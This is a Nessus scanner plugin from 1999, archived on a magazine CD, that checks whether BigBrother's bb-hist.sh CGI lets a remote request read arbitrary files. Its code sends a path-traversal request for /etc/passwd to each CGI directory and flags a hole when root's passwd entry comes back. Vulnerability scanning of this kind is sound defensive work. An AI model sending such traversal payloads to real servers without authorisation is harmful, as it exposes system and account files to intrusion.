home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / bb-hist.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  1.7 KB  |  70 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10025);
  11.  script_bugtraq_id(142);
  12.  script_version ("$Revision: 1.25 $");
  13.  script_cve_id("CAN-1999-1462");
  14.  
  15.  script_name(english:"bb-hist.sh");
  16.  script_description(
  17.      english:"It is possible to view arbitrary files on a system where versions 1.09b or
  18. 1.09c of 'BigBrother' are installed, using a flaw in the bb-hist.sh CGI
  19. program.
  20.  
  21. Solution : Upgrade to version 1.09d or later.
  22.  
  23. Risk factor : High",
  24.  
  25.     francais:"Il est possible de lire des fichiers arbitraires sur
  26. un systΦme sur lequel les version 1.09b ou 1.09c de 'BigBrother' sont
  27. installΘes, en utilisant un problΦme dans le programme cgi 'bb-hist.sh'.
  28.  
  29. Solution: Upgradez α la version 1.09d ou plus rΘcente.
  30.  
  31. Facteur de risque : ElevΘ");
  32.  
  33.  script_summary(english:"Read arbitrary files using the CGI bb-hist.sh",
  34.          francais:"Lit des fichiers arbitraires en utilisant le CGI bb-hist.sh");
  35.  
  36.  script_family(english:"CGI abuses", francais:"Abus de CGI");
  37.   
  38.  script_category(ACT_GATHER_INFO);
  39.  script_dependencie("find_service.nes", "http_version.nasl");
  40.  script_require_ports("Services/www", 80);
  41.  script_copyright("Copyright (C) 1999 Renaud Deraison"); 
  42.  exit(0);
  43. }
  44.  
  45. #
  46. # The script code starts here
  47. #
  48.  
  49. include("http_func.inc");
  50. include("http_keepalive.inc");
  51.  
  52. port = get_http_port(default:80);
  53.  
  54. if(!get_port_state(port))exit(0);
  55.  
  56.  
  57. foreach dir (cgi_dirs())
  58. {
  59. command = string(dir, "/bb-hist.sh?HISTFILE=../../../../../etc/passwd");
  60. req = http_get(item:command, port:port);
  61. flaw = 0;
  62. buffer = http_keepalive_send_recv(port:port, data:req);
  63. if( buffer == NULL ) exit(0);
  64. if(egrep(pattern:"root:.*:0:[01]:.*", string:buffer))
  65.    {
  66.     security_hole(port);
  67.     exit(0);
  68.    }
  69. }
  70.